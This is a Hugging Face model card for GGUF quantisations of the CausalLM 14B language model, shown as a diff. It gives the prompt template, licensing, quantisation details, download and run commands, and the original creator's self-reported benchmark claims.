+
- qwen
|
| 50 |
+
---
|
| 51 |
+
<!-- markdownlint-disable MD041 -->
|
| 52 |
+
|
| 53 |
+
<!-- header start -->
|
| 54 |
+
<!-- 200823 -->
|
| 55 |
+
<div style=""width: auto; margin-left: auto; margin-right: auto"">
|
| 56 |
+
<img src=""https://i.imgur.com/EBdldam.jpg"" alt=""TheBlokeAI"" style=""width: 100%; min-width: 400px; display: block; margin: auto;"">
|
| 57 |
+
</div>
|
| 58 |
+
<div style=""display: flex; justify-content: space-between; width: 100%;"">
|
| 59 |
+
<div style=""display: flex; flex-direction: column; align-items: flex-start;"">
|
| 60 |
+
<p style=""margin-top: 0.5em; margin-bottom: 0em;""><a href=""https://discord.gg/theblokeai"">Chat & support: TheBloke's Discord server</a></p>
|
| 61 |
+
</div>
|
| 62 |
+
<div style=""display: flex; flex-direction: column; align-items: flex-end;"">
|
| 63 |
+
<p style=""margin-top: 0.5em; margin-bottom: 0em;""><a href=""https://www.patreon.com/TheBlokeAI"">Want to contribute? TheBloke's Patreon page</a></p>
|
| 64 |
+
</div>
|
| 65 |
+
</div>
|
| 66 |
+
<div style=""text-align:center; margin-top: 0em; margin-bottom: 0em""><p style=""margin-top: 0.25em; margin-bottom: 0em;"">TheBloke's LLM work is generously supported by a grant from <a href=""https://a16z.com"">andreessen horowitz (a16z)</a></p></div>
|
| 67 |
+
<hr style=""margin-top: 1.0em; margin-bottom: 1.0em;"">
|
| 68 |
+
<!-- header end -->
|
| 69 |
+
|
| 70 |
+
# CausalLM 14B - GGUF
|
| 71 |
+
- Model creator: [CausalLM](https://huggingface.co/CausalLM)
|
| 72 |
+
- Original model: [CausalLM 14B](https://huggingface.co/CausalLM/14B)
|
| 73 |
+
|
| 74 |
+
<!-- description start -->
|
| 75 |
+
## Description
|
| 76 |
+
|
| 77 |
+
This repo contains GGUF format model files for [CausalLM's CausalLM 14B](https://huggingface.co/CausalLM/14B).
|
| 78 |
+
|
| 79 |
+
**NOTE**: The GGUFs originally uploaded here did not work due to a vocab issue. This was fixed on 23rd October, 15:00 UTC. The files uploaded now are confirmed to work.
|
| 80 |
+
|
| 81 |
+
Please re-download the GGUFs if you had downloaded the originally uploaded GGUF file(s).
|
| 82 |
+
|
| 83 |
+
<!-- description end -->
|
| 84 |
+
<!-- README_GGUF.md-about-gguf start -->
|
| 85 |
+
### About GGUF
|
| 86 |
+
|
| 87 |
+
GGUF is a new format introduced by the llama.cpp team on August 21st 2023. It is a replacement for GGML, which is no longer supported by llama.cpp.
|
| 88 |
+
|
| 89 |
+
Here is an incomplete list of clients and libraries that are known to support GGUF:
|
| 90 |
+
|
| 91 |
+
* [llama.cpp](https://github.com/ggerganov/llama.cpp). The source project for GGUF. Offers a CLI and a server option.
|
| 92 |
+
* [text-generation-webui](https://github.com/oobabooga/text-generation-webui), the most widely used web UI, with many features and powerful extensions. Supports GPU acceleration.
|
| 93 |
+
* [KoboldCpp](https://github.com/LostRuins/koboldcpp), a fully featured web UI, with GPU accel across all platforms and GPU architectures. Especially good for storytelling.
|
| 94 |
+
* [LM Studio](https://lmstudio.ai/), an easy-to-use and powerful local GUI for Windows and macOS (Silicon), with GPU acceleration.
|
| 95 |
+
* [LoLLMS Web UI](https://github.com/ParisNeo/lollms-webui), a great web UI with many interesting and unique features, including a full model library for easy model selection.
|
| 96 |
+
* [Faraday.dev](https://faraday.dev/), an attractive and easy to use character-based chat GUI for Windows and macOS (both Silicon and Intel), with GPU acceleration.
|
| 97 |
+
* [ctransformers](https://github.com/marella/ctransformers), a Python library with GPU accel, LangChain support, and OpenAI-compatible AI server.
|
| 98 |
+
* [llama-cpp-python](https://github.com/abetlen/llama-cpp-python), a Python library with GPU accel, LangChain support, and OpenAI-compatible API server.
|
| 99 |
+
* [candle](https://github.com/huggingface/candle), a Rust ML framework with a focus on performance, including GPU support, and ease of use.
|
| 100 |
+
|
| 101 |
+
<!-- README_GGUF.md-about-gguf end -->
|
| 102 |
+
<!-- repositories-available start -->
|
| 103 |
+
## Repositories available
|
| 104 |
+
|
| 105 |
+
* [AWQ model(s) for GPU inference.](https://huggingface.co/TheBloke/CausalLM-14B-AWQ)
|
| 106 |
+
* [GPTQ models for GPU inference, with multiple quantisation parameter options.](https://huggingface.co/TheBloke/CausalLM-14B-GPTQ)
|
| 107 |
+
* [2, 3, 4, 5, 6 and 8-bit GGUF models for CPU+GPU inference](https://huggingface.co/TheBloke/CausalLM-14B-GGUF)
|
| 108 |
+
* [CausalLM's original unquantised fp16 model in pytorch format, for GPU inference and for further conversions](https://huggingface.co/CausalLM/14B)
|
| 109 |
+
<!-- repositories-available end -->
|
| 110 |
+
|
| 111 |
+
<!-- prompt-template start -->
|
| 112 |
+
## Prompt template: ChatML
|
| 113 |
+
|
| 114 |
+
```
|
| 115 |
+
<|im_start|>system
|
| 116 |
+
{system_message}<|im_end|>
|
| 117 |
+
<|im_start|>user
|
| 118 |
+
{prompt}<|im_end|>
|
| 119 |
+
<|im_start|>assistant
|
| 120 |
+
|
| 121 |
+
```
|
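
As a quick illustration (not part of the original card), here is a minimal Python sketch that fills in the ChatML template above; `build_chatml` is a hypothetical helper and the message contents are placeholders:

```python
# Minimal sketch: assemble a ChatML-formatted prompt string for this model.
def build_chatml(system_message: str, prompt: str) -> str:
    return (
        f'<|im_start|>system\n{system_message}<|im_end|>\n'
        f'<|im_start|>user\n{prompt}<|im_end|>\n'
        f'<|im_start|>assistant\n'
    )

print(build_chatml('You are a helpful assistant.', 'AI is going to'))
```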
| 122 |
+
|
| 123 |
+
<!-- prompt-template end -->
|
| 124 |
+
<!-- licensing start -->
|
| 125 |
+
## Licensing
|
| 126 |
+
|
| 127 |
+
The creator of the source model has listed its license as `wtfpl`, and this quantization has therefore used that same license.
|
| 128 |
+
|
| 129 |
+
As this model is based on Llama 2, it is also subject to the Meta Llama 2 license terms, and the license files for that are additionally included. It should therefore be considered as being claimed to be licensed under both licenses. I contacted Hugging Face for clarification on dual licensing but they do not yet have an official position. Should this change, or should Meta provide any feedback on this situation, I will update this section accordingly.
|
| 130 |
+
|
| 131 |
+
In the meantime, any questions regarding licensing, and in particular how these two licenses might interact, should be directed to the original model repository: [CausalLM's CausalLM 14B](https://huggingface.co/CausalLM/14B).
|
| 132 |
+
<!-- licensing end -->
|
| 133 |
+
<!-- compatibility_gguf start -->
|
| 134 |
+
## Compatibility
|
| 135 |
+
|
| 136 |
+
These quantised GGUFv2 files are compatible with llama.cpp from August 27th onwards, as of commit [d0cee0d](https://github.com/ggerganov/llama.cpp/commit/d0cee0d36d5be95a0d9088b674dbb27354107221)
|
| 137 |
+
|
| 138 |
+
They are also compatible with many third party UIs and libraries - please see the list at the top of this README.
|
| 139 |
+
|
| 140 |
+
## Explanation of quantisation methods
|
| 141 |
+
|
| 142 |
+
<details>
|
| 143 |
+
<summary>Click to see details</summary>
|
| 144 |
+
|
| 145 |
+
The new methods available are:
|
| 146 |
+
|
| 147 |
+
* GGML_TYPE_Q2_K - ""type-1"" 2-bit quantization in super-blocks containing 16 blocks, each block having 16 weights. Block scales and mins are quantized with 4 bits. This ends up effectively using 2.5625 bits per weight (bpw).
|
| 148 |
+
* GGML_TYPE_Q3_K - ""type-0"" 3-bit quantization in super-blocks containing 16 blocks, each block having 16 weights. Scales are quantized with 6 bits. This ends up using 3.4375 bpw.
|
| 149 |
+
* GGML_TYPE_Q4_K - ""type-1"" 4-bit quantization in super-blocks containing 8 blocks, each block having 32 weights. Scales and mins are quantized with 6 bits. This ends up using 4.5 bpw.
|
| 150 |
+
* GGML_TYPE_Q5_K - ""type-1"" 5-bit quantization. Same super-block structure as GGML_TYPE_Q4_K, resulting in 5.5 bpw.
|
| 151 |
+
* GGML_TYPE_Q6_K - ""type-0"" 6-bit quantization. Super-blocks with 16 blocks, each block having 16 weights. Scales are quantized with 8 bits. This ends up using 6.5625 bpw.
|
| 152 |
+
|
| 153 |
+
Refer to the Provided Files table below to see what files use which methods, and how.
|
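
To make the bpw figures above concrete, here is a small arithmetic sketch for GGML_TYPE_Q4_K (not from the original card); the per-super-block fp16 scale/min overhead is an assumption based on the k-quant layout, not stated here:

```python
# Effective bits per weight (bpw) for Q4_K: super-blocks of 8 blocks x 32 weights.
weights = 8 * 32                  # 256 weights per super-block
weight_bits = weights * 4         # 4-bit quantised weights
scale_min_bits = 8 * (6 + 6)      # 6-bit scale and 6-bit min for each block
super_bits = 2 * 16               # assumed fp16 scale and min per super-block
print((weight_bits + scale_min_bits + super_bits) / weights)  # -> 4.5 bpw
```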
| 154 |
+
</details>
|
| 155 |
+
<!-- compatibility_gguf end -->
|
| 156 |
+
|
| 157 |
+
<!-- README_GGUF.md-provided-files start -->
|
| 158 |
+
## Provided files
|
| 159 |
+
|
| 160 |
+
| Name | Quant method | Bits | Size | Max RAM required | Use case |
|
| 161 |
+
| ---- | ---- | ---- | ---- | ---- | ----- |
|
| 162 |
+
| [causallm_14b.Q4_0.gguf](https://huggingface.co/TheBloke/CausalLM-14B-GGUF/blob/main/causallm_14b.Q4_0.gguf) | Q4_0 | 4 | 8.18 GB| 10.68 GB | legacy; small, very high quality loss - prefer using Q3_K_M |
|
| 163 |
+
| [causallm_14b.Q4_1.gguf](https://huggingface.co/TheBloke/CausalLM-14B-GGUF/blob/main/causallm_14b.Q4_1.gguf) | Q4_1 | 4 | 9.01 GB| 11.51 GB | legacy; small, substantial quality loss - prefer using Q3_K_L |
|
| 164 |
+
| [causallm_14b.Q5_0.gguf](https://huggingface.co/TheBloke/CausalLM-14B-GGUF/blob/main/causallm_14b.Q5_0.gguf) | Q5_0 | 5 | 9.85 GB| 12.35 GB | legacy; medium, balanced quality - prefer using Q4_K_M |
|
| 165 |
+
| [causallm_14b.Q5_1.gguf](https://huggingface.co/TheBloke/CausalLM-14B-GGUF/blob/main/causallm_14b.Q5_1.gguf) | Q5_1 | 5 | 10.69 GB| 13.19 GB | legacy; medium, low quality loss - prefer using Q5_K_M |
|
| 166 |
+
| [causallm_14b.Q8_0.gguf](https://huggingface.co/TheBloke/CausalLM-14B-GGUF/blob/main/causallm_14b.Q8_0.gguf) | Q8_0 | 8 | 15.06 GB| 17.56 GB | very large, extremely low quality loss - not recommended |
|
| 167 |
+
|
| 168 |
+
**Note**: the above RAM figures assume no GPU offloading. If layers are offloaded to the GPU, this will reduce RAM usage and use VRAM instead.
|
| 169 |
+
|
| 170 |
+
|
| 171 |
+
|
| 172 |
+
<!-- README_GGUF.md-provided-files end -->
|
| 173 |
+
|
| 174 |
+
<!-- README_GGUF.md-how-to-download start -->
|
| 175 |
+
## How to download GGUF files
|
| 176 |
+
|
| 177 |
+
**Note for manual downloaders:** You almost never want to clone the entire repo! Multiple different quantisation formats are provided, and most users only want to pick and download a single file.
|
| 178 |
+
|
| 179 |
+
The following clients/libraries will automatically download models for you, providing a list of available models to choose from:
|
| 180 |
+
|
| 181 |
+
* LM Studio
|
| 182 |
+
* LoLLMS Web UI
|
| 183 |
+
* Faraday.dev
|
| 184 |
+
|
| 185 |
+
### In `text-generation-webui`
|
| 186 |
+
|
| 187 |
+
Under Download Model, you can enter the model repo: TheBloke/CausalLM-14B-GGUF and below it, a specific filename to download, such as: causallm_14b.Q4_K_M.gguf.
|
| 188 |
+
|
| 189 |
+
Then click Download.
|
| 190 |
+
|
| 191 |
+
### On the command line, including multiple files at once
|
| 192 |
+
|
| 193 |
+
I recommend using the `huggingface-hub` Python library:
|
| 194 |
+
|
| 195 |
+
```shell
|
| 196 |
+
pip3 install huggingface-hub
|
| 197 |
+
```
|
| 198 |
+
|
| 199 |
+
Then you can download any individual model file to the current directory, at high speed, with a command like this:
|
| 200 |
+
|
| 201 |
+
```shell
|
| 202 |
+
huggingface-cli download TheBloke/CausalLM-14B-GGUF causallm_14b.Q4_K_M.gguf --local-dir . --local-dir-use-symlinks False
|
| 203 |
+
```
|
| 204 |
+
|
| 205 |
+
<details>
|
| 206 |
+
<summary>More advanced huggingface-cli download usage</summary>
|
| 207 |
+
|
| 208 |
+
You can also download multiple files at once with a pattern:
|
| 209 |
+
|
| 210 |
+
```shell
|
| 211 |
+
huggingface-cli download TheBloke/CausalLM-14B-GGUF --local-dir . --local-dir-use-symlinks False --include='*Q4_K*gguf'
|
| 212 |
+
```
|
| 213 |
+
|
| 214 |
+
For more documentation on downloading with `huggingface-cli`, please see: [HF -> Hub Python Library -> Download files -> Download from the CLI](https://huggingface.co/docs/huggingface_hub/guides/download#download-from-the-cli).
|
| 215 |
+
|
| 216 |
+
To accelerate downloads on fast connections (1Gbit/s or higher), install `hf_transfer`:
|
| 217 |
+
|
| 218 |
+
```shell
|
| 219 |
+
pip3 install hf_transfer
|
| 220 |
+
```
|
| 221 |
+
|
| 222 |
+
And set environment variable `HF_HUB_ENABLE_HF_TRANSFER` to `1`:
|
| 223 |
+
|
| 224 |
+
```shell
|
| 225 |
+
HF_HUB_ENABLE_HF_TRANSFER=1 huggingface-cli download TheBloke/CausalLM-14B-GGUF causallm_14b.Q4_K_M.gguf --local-dir . --local-dir-use-symlinks False
|
| 226 |
+
```
|
| 227 |
+
|
| 228 |
+
Windows Command Line users: You can set the environment variable by running `set HF_HUB_ENABLE_HF_TRANSFER=1` before the download command.
|
| 229 |
+
</details>
|
| 230 |
+
<!-- README_GGUF.md-how-to-download end -->
|
| 231 |
+
|
| 232 |
+
<!-- README_GGUF.md-how-to-run start -->
|
| 233 |
+
## Example `llama.cpp` command
|
| 234 |
+
|
| 235 |
+
Make sure you are using `llama.cpp` from commit [d0cee0d](https://github.com/ggerganov/llama.cpp/commit/d0cee0d36d5be95a0d9088b674dbb27354107221) or later.
|
| 236 |
+
|
| 237 |
+
```shell
|
| 238 |
+
./main -ngl 32 -m causallm_14b.Q4_K_M.gguf --color -c 4096 --temp 0.7 --repeat_penalty 1.1 -n -1 -p ""<|im_start|>system\n{system_message}<|im_end|>\n<|im_start|>user\n{prompt}<|im_end|>\n<|im_start|>assistant""
|
| 239 |
+
```
|
| 240 |
+
|
| 241 |
+
Change `-ngl 32` to the number of layers to offload to GPU. Remove it if you don't have GPU acceleration.
|
| 242 |
+
|
| 243 |
+
Change `-c 4096` to the desired sequence length. For extended sequence models - e.g. 8K, 16K, 32K - the necessary RoPE scaling parameters are read from the GGUF file and set by llama.cpp automatically.
|
| 244 |
+
|
| 245 |
+
If you want to have a chat-style conversation, replace the `-p <PROMPT>` argument with `-i -ins`
|
| 246 |
+
|
| 247 |
+
For other parameters and how to use them, please refer to [the llama.cpp documentation](https://github.com/ggerganov/llama.cpp/blob/master/examples/main/README.md)
|
| 248 |
+
|
| 249 |
+
## How to run in `text-generation-webui`
|
| 250 |
+
|
| 251 |
+
Further instructions here: [text-generation-webui/docs/llama.cpp.md](https://github.com/oobabooga/text-generation-webui/blob/main/docs/llama.cpp.md).
|
| 252 |
+
|
| 253 |
+
## How to run from Python code
|
| 254 |
+
|
| 255 |
+
You can use GGUF models from Python using the [llama-cpp-python](https://github.com/abetlen/llama-cpp-python) or [ctransformers](https://github.com/marella/ctransformers) libraries.
|
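
As a minimal llama-cpp-python sketch (assuming `pip install llama-cpp-python` and a downloaded GGUF file; the path and parameters here are illustrative), you can do something like the following. A ctransformers example follows in the next subsection.

```python
# Minimal llama-cpp-python sketch for a GGUF model (path/params illustrative).
from llama_cpp import Llama

llm = Llama(
    model_path='./causallm_14b.Q4_K_M.gguf',  # your downloaded GGUF file
    n_gpu_layers=32,  # set to 0 if you have no GPU acceleration
    n_ctx=4096,       # context length
)
output = llm(
    '<|im_start|>system\nYou are a helpful assistant.<|im_end|>\n'
    '<|im_start|>user\nAI is going to<|im_end|>\n<|im_start|>assistant\n',
    max_tokens=128,
)
print(output['choices'][0]['text'])
```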
| 256 |
+
|
| 257 |
+
### How to load this model in Python code, using ctransformers
|
| 258 |
+
|
| 259 |
+
#### First install the package
|
| 260 |
+
|
| 261 |
+
Run one of the following commands, according to your system:
|
| 262 |
+
|
| 263 |
+
```shell
|
| 264 |
+
# Base ctransformers with no GPU acceleration
|
| 265 |
+
pip install ctransformers
|
| 266 |
+
# Or with CUDA GPU acceleration
|
| 267 |
+
pip install ctransformers[cuda]
|
| 268 |
+
# Or with AMD ROCm GPU acceleration (Linux only)
|
| 269 |
+
CT_HIPBLAS=1 pip install ctransformers --no-binary ctransformers
|
| 270 |
+
# Or with Metal GPU acceleration for macOS systems only
|
| 271 |
+
CT_METAL=1 pip install ctransformers --no-binary ctransformers
|
| 272 |
+
```
|
| 273 |
+
|
| 274 |
+
#### Simple ctransformers example code
|
| 275 |
+
|
| 276 |
+
```python
|
| 277 |
+
from ctransformers import AutoModelForCausalLM
|
| 278 |
+
|
| 279 |
+
# Set gpu_layers to the number of layers to offload to GPU. Set to 0 if no GPU acceleration is available on your system.
|
| 280 |
+
llm = AutoModelForCausalLM.from_pretrained(""TheBloke/CausalLM-14B-GGUF"", model_file=""causallm_14b.Q4_K_M.gguf"", model_type=""llama"", gpu_layers=50)
|
| 281 |
+
|
| 282 |
+
print(llm(""AI is going to""))
|
| 283 |
+
```
|
| 284 |
+
|
| 285 |
+
## How to use with LangChain
|
| 286 |
+
|
| 287 |
+
Here are guides on using llama-cpp-python and ctransformers with LangChain:
|
| 288 |
+
|
| 289 |
+
* [LangChain + llama-cpp-python](https://python.langchain.com/docs/integrations/llms/llamacpp)
|
| 290 |
+
* [LangChain + ctransformers](https://python.langchain.com/docs/integrations/providers/ctransformers)
|
| 291 |
+
|
| 292 |
+
<!-- README_GGUF.md-how-to-run end -->
|
| 293 |
+
|
| 294 |
+
<!-- footer start -->
|
| 295 |
+
<!-- 200823 -->
|
| 296 |
+
## Discord
|
| 297 |
+
|
| 298 |
+
For further support, and discussions on these models and AI in general, join us at:
|
| 299 |
+
|
| 300 |
+
[TheBloke AI's Discord server](https://discord.gg/theblokeai)
|
| 301 |
+
|
| 302 |
+
## Thanks, and how to contribute
|
| 303 |
+
|
| 304 |
+
Thanks to the [chirper.ai](https://chirper.ai) team!
|
| 305 |
+
|
| 306 |
+
Thanks to Clay from [gpus.llm-utils.org](https://gpus.llm-utils.org)!
|
| 307 |
+
|
| 308 |
+
I've had a lot of people ask if they can contribute. I enjoy providing models and helping people, and would love to be able to spend even more time doing it, as well as expanding into new projects like fine tuning/training.
|
| 309 |
+
|
| 310 |
+
If you're able and willing to contribute, it will be most gratefully received and will help me to keep providing more models, and to start work on new AI projects.
|
| 311 |
+
|
| 312 |
+
Donaters will get priority support on any and all AI/LLM/model questions and requests, access to a private Discord room, plus other benefits.
|
| 313 |
+
|
| 314 |
+
* Patreon: https://patreon.com/TheBlokeAI
|
| 315 |
+
* Ko-Fi: https://ko-fi.com/TheBlokeAI
|
| 316 |
+
|
| 317 |
+
**Special thanks to**: Aemon Algiz.
|
| 318 |
+
|
| 319 |
+
**Patreon special mentions**: Pierre Kircher, Stanislav Ovsiannikov, Michael Levine, Eugene Pentland, Andrey, 준교 김, Randy H, Fred von Graf, Artur Olbinski, Caitlyn Gatomon, terasurfer, Jeff Scroggin, James Bentley, Vadim, Gabriel Puliatti, Harry Royden McLaughlin, Sean Connelly, Dan Guido, Edmond Seymore, Alicia Loh, subjectnull, AzureBlack, Manuel Alberto Morcote, Thomas Belote, Lone Striker, Chris Smitley, Vitor Caleffi, Johann-Peter Hartmann, Clay Pascal, biorpg, Brandon Frisco, sidney chen, transmissions 11, Pedro Madruga, jinyuan sun, Ajan Kanaga, Emad Mostaque, Trenton Dambrowitz, Jonathan Leane, Iucharbius, usrbinkat, vamX, George Stoitzev, Luke Pendergrass, theTransient, Olakabola, Swaroop Kallakuri, Cap'n Zoog, Brandon Phillips, Michael Dempsey, Nikolai Manek, danny, Matthew Berman, Gabriel Tamborski, alfie_i, Raymond Fosdick, Tom X Nguyen, Raven Klaugh, LangChain4j, Magnesian, Illia Dulskyi, David Ziegler, Mano Prime, Luis Javier Navarrete Lozano, Erik Bjäreholt, 阿明, Nathan Dryer, Alex, Rainer Wilmers, zynix, TL, Joseph William Delisle, John Villwock, Nathan LeClaire, Willem Michiel, Joguhyik, GodLy, OG, Alps Aficionado, Jeffrey Morgan, ReadyPlayerEmma, Tiffany J. Kim, Sebastain Graf, Spencer Kim, Michael Davis, webtim, Talal Aujan, knownsqashed, John Detwiler, Imad Khwaja, Deo Leter, Jerry Meng, Elijah Stavena, Rooh Singh, Pieter, SuperWojo, Alexandros Triantafyllidis, Stephen Murray, Ai Maven, ya boyyy, Enrico Ros, Ken Nordquist, Deep Realms, Nicholas, Spiking Neurons AB, Elle, Will Dee, Jack West, RoA, Luke @flexchar, Viktor Bowallius, Derek Yates, Subspace Studios, jjj, Toran Billups, Asp the Wyvern, Fen Risland, Ilya, NimbleBox.ai, Chadd, Nitin Borwankar, Emre, Mandus, Leonard Tan, Kalila, K, Trailburnt, S_X, Cory Kujawski
|
| 320 |
+
|
| 321 |
+
|
| 322 |
+
Thank you to all my generous patrons and donaters!
|
| 323 |
+
|
| 324 |
+
And thank you again to a16z for their generous grant.
|
| 325 |
+
|
| 326 |
+
<!-- footer end -->
|
| 327 |
+
|
| 328 |
+
<!-- original-model-card start -->
|
| 329 |
+
# Original model card: CausalLM's CausalLM 14B
|
| 330 |
+
|
| 331 |
+

|
| 332 |
+
|
| 333 |
+
*Image drawn by GPT-4 DALL·E 3* TL;DR: Perhaps better than all existing models < 70B, in most quantitative evaluations...
|
| 334 |
+
|
| 335 |
+
# Please Stop Using WRONG unofficial quant models unless you know what you're doing
|
| 336 |
+
|
| 337 |
+
GPTQ quants require a good dataset for calibration, and the default C4 dataset is not suitable.
|
| 338 |
+
|
| 339 |
+
**llama.cpp GGUF models**
|
| 340 |
+
GPT2Tokenizer fixed by [Kerfuffle](https://github.com/KerfuffleV2) on [https://github.com/ggerganov/llama.cpp/pull/3743](https://github.com/ggerganov/llama.cpp/pull/3743), new models to be reuploaded.
|
| 341 |
+
|
| 342 |
+
# Read Me:
|
| 343 |
+
|
| 344 |
+
Also see [7B Version](https://huggingface.co/CausalLM/7B)
|
| 345 |
+
|
| 346 |
+
This model was trained based on the model weights of Qwen (and LLaMA2 was used, yes, for calculating some initial weights); you may also need to comply with the commercial use restrictions of these two models depending on the situation. The training process utilized a model structure that was identical to LLaMA2, using the same attention calculation method as the original MHA LLaMA2 models, with no additional scaling applied to the Rotary Position Embedding (RoPE).
|
| 347 |
+
|
| 348 |
+
We manually curated an SFT dataset of 1.3B tokens for training, utilizing open source datasets from Hugging Face. For most of these sentences, we performed manual or synthetic rewrites and generated alternate language versions using larger language models. Additionally, we conducted augmented text training using carefully selected entries from Wikipedia, as well as featured entries from Fandom and filtered entries from Moegirlpedia. In order to strike a balance between efficiency and quality, 100% of the data used for training was synthetic; no direct use of text from the internet or original texts from publicly available datasets was employed for fine-tuning.
|
| 349 |
+
|
| 350 |
+
The 7B version of the model is a distilled version of the 14B model, specifically designed for speculative sampling. Therefore, it is important to exercise caution when directly using the model, as it may produce hallucinations or unreliable outputs.
|
| 351 |
+
|
| 352 |
+
Please note that the model was trained on unfiltered internet data. Since we do not have the capacity to vet all of it, there may be a substantial amount of objectionable content, pornography, violence, and offensive language present that we are unable to remove. Therefore, you will still need to complete your own checks on the model's safety and filter keywords in the output. Due to computational resource constraints, we are presently unable to implement RLHF for the model's ethics and safety, nor to train on SFT samples that refuse to answer certain questions for restrictive fine-tuning.
|
| 353 |
+
|
| 354 |
+
Bonus: The model underwent some fine-tuning on the prompt format introduced in LLaVA1.5, which is unrelated to image attention calculation. Therefore, aligning the ViT projection module with the frozen LM under visual instructions would enable rapid implementation of effective multimodal capabilities.
|
| 355 |
+
|
| 356 |
+
## PROMPT FORMAT:
|
| 357 |
+
[chatml](https://github.com/openai/openai-python/blob/main/chatml.md)
|
| 358 |
+
|
| 359 |
+
**System Prompt must not be empty!**
|
| 360 |
+
|
| 361 |
+
## MMLU:
|
| 362 |
+
STEM ACC: 64.19
|
| 363 |
+
|
| 364 |
+
Humanities ACC: 61.40
|
| 365 |
+
|
| 366 |
+
Other ACC: 71.64
|
| 367 |
+
|
| 368 |
+
Social ACC: 75.37
|
| 369 |
+
|
| 370 |
+
**AVERAGE ACC: 67.36** (Outperforms ALL models under 70B; very close to the best 70B fine-tunes)
|
| 371 |
+
|
| 372 |
+
|
| 373 |
+
## CEval (Val):
|
| 374 |
+
STEM ACC: 66.71
|
| 375 |
+
|
| 376 |
+
Social Science ACC: 85.10
|
| 377 |
+
|
| 378 |
+
Humanities ACC: 76.68
|
| 379 |
+
|
| 380 |
+
Other ACC: 70.23
|
| 381 |
+
|
| 382 |
+
Hard ACC: 54.71
|
| 383 |
+
|
| 384 |
+
**AVERAGE ACC: 73.10** (Outperforms Qwen-14B and GPT-4)
|
| 385 |
+
|
| 386 |
+
## GSM8K
|
| 387 |
+
|
| 388 |
+
**Zero-shot ACC: 0.7012888551933283** (Outperforms MetaMath-13B and Qwen-14B)
|
| 389 |
+
|
| 390 |
+
## AlpacaEval Leaderboard
|
| 391 |
+
| | win_rate | standard_error | n_wins | n_wins_base | n_draws | n_total | mode | avg_length |
|
| 392 |
+
| ------------ | -------- | -------------- | ------ | ----------- | ------- | ------- | --------- | ---------- |
|
| 393 |
+
| causallm-14b | **88.26087** | 1.116333 | 705 | 89 | 11 | 805 | community | 1391 |
|
| 394 |
+
|
| 395 |
+
|
| 396 |
+
Win rate **88.26%** on [AlpacaEval Leaderboard](https://tatsu-lab.github.io/alpaca_eval/) [view raw](https://github.com/tatsu-lab/alpaca_eval/blob/3a47dcd81c56f6a8e6a5711f2754013919fbe90a/results/causallm-14b/model_outputs.json)
|
| 397 |
+
|
| 398 |
+
**There are some issues with llama.cpp on GPT2Tokenizer; they will be fixed as soon as possible...**
|
| 399 |
+
|
| 400 |
+
**llama.cpp GGUF models**
|
| 401 |
+
GPT2Tokenizer support fixed by [Kerfuffle](https://github.com/KerfuffleV2) in [https://github.com/ggerganov/llama.cpp/pull/3743](https://github.com/ggerganov/llama.cpp/pull/3743); new models will be uploaded later.
|
| 402 |
+
|
| 403 |
+
## Read Me:
|
| 404 |
+
|
| 405 |
+
Also see the [7B version](https://huggingface.co/CausalLM/7B)
|
| 406 |
+
|
| 407 |
+
This model was trained based on the weights of Qwen (and LLaMA2 weights were used, yes, for calculating some initial weights); depending on your situation, you may also need to comply with the commercial use restrictions of these two models. The training process used a model structure identical to LLaMA2, with the same attention calculation method as the original MHA LLaMA2 models, and no additional scaling was applied to the Rotary Position Embedding (RoPE).
|
| 408 |
+
|
| 409 |
+
We manually curated an SFT dataset of 1.3 billion tokens for training, utilizing open-source datasets from Hugging Face. For most sentences, we performed manual or synthetic rewrites and generated versions in other languages using larger language models. In addition, we conducted augmented text training using carefully selected entries from Wikipedia, featured entries from Fandom, and filtered entries from Moegirlpedia. To strike a balance between efficiency and quality, 100% of the data used for training was synthetic; no raw text from the internet or from publicly available datasets was used directly for fine-tuning.
|
| 410 |
+
|
| 411 |
+
The 7B version of the model is a distilled version of the 14B model, designed specifically for speculative sampling. Therefore, exercise caution when using the model directly, as it may produce hallucinations or unreliable outputs.
|
| 412 |
+
|
| 413 |
+
Please note that the model was trained on unfiltered internet data. Since we cannot vet all of it, there may be a substantial amount of objectionable content, pornography, violence, and offensive language that we are unable to remove. You will therefore still need to perform your own checks on the model's safety and filter keywords in its output. Due to computational resource constraints, we are currently unable to implement RLHF for the model's ethics and safety, nor to train on SFT samples that refuse to answer certain questions for restrictive fine-tuning.
|
| 414 |
+
|
| 415 |
+
Bonus: the model received some fine-tuning on the prompt format introduced in LLaVA1.5, which is unrelated to image attention calculation. Therefore, aligning the ViT projection module with the frozen LM under visual instructions would enable rapid implementation of effective multimodal capabilities.
|
| 416 |
+
|
| 417 |
+
## Prompt format:
|
| 418 |
+
[chatml](https://github.com/openai/openai-python/blob/main/chatml.md)
|
| 419 |
+
|
| 420 |
+
**System Prompt must not be empty!**
|
| 421 |
+
|
| 422 |
+
|
| 423 |
+
## MMLU:
|
| 424 |
+
STEM ACC: 64.19
|
| 425 |
+
|
| 426 |
+
Humanities ACC: 61.40
|
| 427 |
+
|
| 428 |
+
Other ACC: 71.64
|
| 429 |
+
|
| 430 |
+
Social ACC: 75.37
|
| 431 |
+
|
| 432 |
+
**AVERAGE ACC: 67.36** (Outperforms all models under 70B; very close to the best 70B fine-tunes)
|
| 433 |
+
|
| 434 |
+
## CEval (Val):
|
| 435 |
+
STEM ACC: 66.71
|
| 436 |
+
|
| 437 |
+
Social Science ACC: 85.10
|
| 438 |
+
|
| 439 |
+
Humanities ACC: 76.68
|
| 440 |
+
|
| 441 |
+
Other ACC: 70.23
|
| 442 |
+
|
| 443 |
+
Hard ACC: 54.71
|
| 444 |
+
|
| 445 |
+
**AVERAGE ACC: 73.10** (Outperforms Qwen-14B and GPT-4)
|
| 446 |
+
|
| 447 |
+
## GSM8K
|
| 448 |
+
|
| 449 |
+
**Zero-shot ACC: 0.7012888551933283** (Outperforms MetaMath-13B and Qwen-14B)
|
| 450 |
+
|
| 451 |
+
## AlpacaEval Leaderboard
|
| 452 |
+
| | win_rate | standard_error | n_wins | n_wins_base | n_draws | n_total | mode | avg_length |
|
| 453 |
+
| ------------ | -------- | -------------- | ------ | ----------- | ------- | ------- | --------- | ---------- |
|
| 454 |
+
| causallm-14b | **88.26087** | 1.116333 | 705 | 89 | 11 | 805 | community | 1391 |
|
| 455 |
+
|
| 456 |
+
Win rate **88.26%** on the [AlpacaEval Leaderboard](https://tatsu-lab.github.io/alpaca_eval/) [view raw](https://github.com/tatsu-lab/alpaca_eval/blob/3a47dcd81c56f6a8e6a5711f2754013919fbe90a/results/causallm-14b/model_outputs.json)
|
| 457 |
+
|
| 458 |
+
<!-- original-model-card end -->
|
| 459 |
+
